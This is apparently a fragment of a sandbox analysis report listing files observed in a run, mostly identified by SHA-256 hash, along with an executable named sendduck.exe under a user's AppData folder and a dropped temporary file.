11a8f947339d30605a086d0c8865366567767e0354baaf83a941c484b7cb297b | Downloaded File | Text |
Unknown
|
...
|
»
2378505ba90d0efce5aad0e99f7404aeefea38e63d2143b55c36329a3b6f0565 | Downloaded File | Text |
Unknown
|
...
|
»
2637cb9ee46cc3256cd8577abfc931afd12a96f9981b3fd5827227cf0ba12cd6 | Downloaded File | Stream |
Unknown
|
...
|
»
2e938bc4a4775df9b8d1200c344378e26384af7577fd8c2d382be2276671f74b | Downloaded File | Stream |
Unknown
|
...
|
»
71f317489fbcb825c6bdf67306ec7bbfb0b633d36a3ed6fb3d98e41f013c0ae5 | Downloaded File | Stream |
Unknown
|
...
|
»
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduck.exe | Downloaded File | Binary |
Unknown
|
...
|
»
8e1ae0723fecadc45d941aecb35a413a7d262fa8bb4a83a85a6a2a9b53b93867 | Downloaded File | Stream |
Unknown
|
...
|
»
9cf8b440553c89e47b7a895540e1f03075b7f15bea22ae8a228133a7e0555006 | Downloaded File | Text |
Unknown
|
...
|
»
b76e9f86695cd63c763553bd860c3bf7918a7971160bc1bac7b054ad058f2648 | Downloaded File | Text |
Unknown
|
...
|
»
bc695b3c606220452b883b30a00834c047a64a8f9fcd9345be7fe7dd80cb3d9a | Downloaded File | Text |
Unknown
|
...
|
»
c87760958d4fe8a3a8c51760f0fd445e65028fcfea3010263a59cd84e724cf15 | Downloaded File | Stream |
Unknown
|
...
|
»
ed0031bde979f0f8c7373c948c6383539e092da37c2fa5a1461ccf039c640143 | Downloaded File | Stream |
Unknown
|
...
|
»
f80bef0f7aed816867b8c49775c3c387fdb22ce02caef5e59d3c2fe9b5abcaa5 | Downloaded File | Text |
Unknown
|
...
|
»
C:\Users\aETAdzjz\AppData\Local\Temp\D2A9.tmp | Dropped File | Unknown |
Not Queried
|
...
|
»